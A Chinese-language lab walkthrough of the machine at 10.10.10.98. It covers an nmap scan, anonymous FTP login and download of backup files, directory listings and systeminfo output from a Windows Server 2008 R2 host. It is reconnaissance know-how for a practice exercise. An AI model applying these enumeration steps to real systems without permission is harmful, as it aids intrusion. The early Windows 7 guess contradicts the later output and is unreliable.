Nmap scan report for 10.10.10.98 Host is up (0.13s latency). Not shown: 997 filtered ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http
nmap -sV -p 21,23,8010.10.10.98 21/tcp open ftp Microsoft ftpd 23/tcp open telnet? 80/tcp open http Microsoft IIS httpd 7.5
os: 通过搜索关键词”IIS 7.5“,可得知系统版本为windows 7
21
ftp匿名登陆
1 2 3
ls 08-23-1808:16PM <DIR> Backups 08-24-1809:00PM <DIR> Engineer
获得了两个文件Access Control.zip、backup.mdb
ftp传输报错
1 2 3
WARNING! 28296 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete.
于是查看是否传输成功
mdb文件的大小
1 2 3 4 5 6
服务器文件: 08-23-18 08:16PM 5652480 backup.mdb
本地文件: -rw-r--r-- 1 root root 5651666 Dec 27 21:16 backup.mdb
08/23/201810:05 PM <DIR> inetpub 07/14/200903:20 AM <DIR> PerfLogs 08/23/201808:53 PM <DIR> Program Files 08/24/201807:40 PM <DIR> Program Files (x86) 08/24/201807:39 PM <DIR> temp 01/07/201908:50 PM <DIR> Users 08/23/201810:40 PM <DIR> Windows 08/22/201807:23 AM <DIR> ZKTeco 0File(s) 0 bytes cd ZKTeco/ZKAccess3.5 有很多access数据库文件
cd inetpub
C:\inetpub>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\inetpub
08/23/201810:05 PM <DIR> .
08/23/201810:05 PM <DIR> ..
08/21/201808:55 PM <DIR> custerr
08/23/201810:50 PM <DIR> ftproot
08/24/201808:22 PM <DIR> history
08/21/201808:55 PM <DIR> logs
08/21/201808:55 PM <DIR> temp
08/24/201807:39 PM <DIR> wwwroot
0File(s) 0 bytes
8 Dir(s) 16,620,236,800 bytes free
输入命令systeminfo
Host Name: ACCESS OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-507-9857321-84191 Original Install Date: 8/21/2018, 9:43:10 PM System Boot Time: 1/7/2019, 8:14:54 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC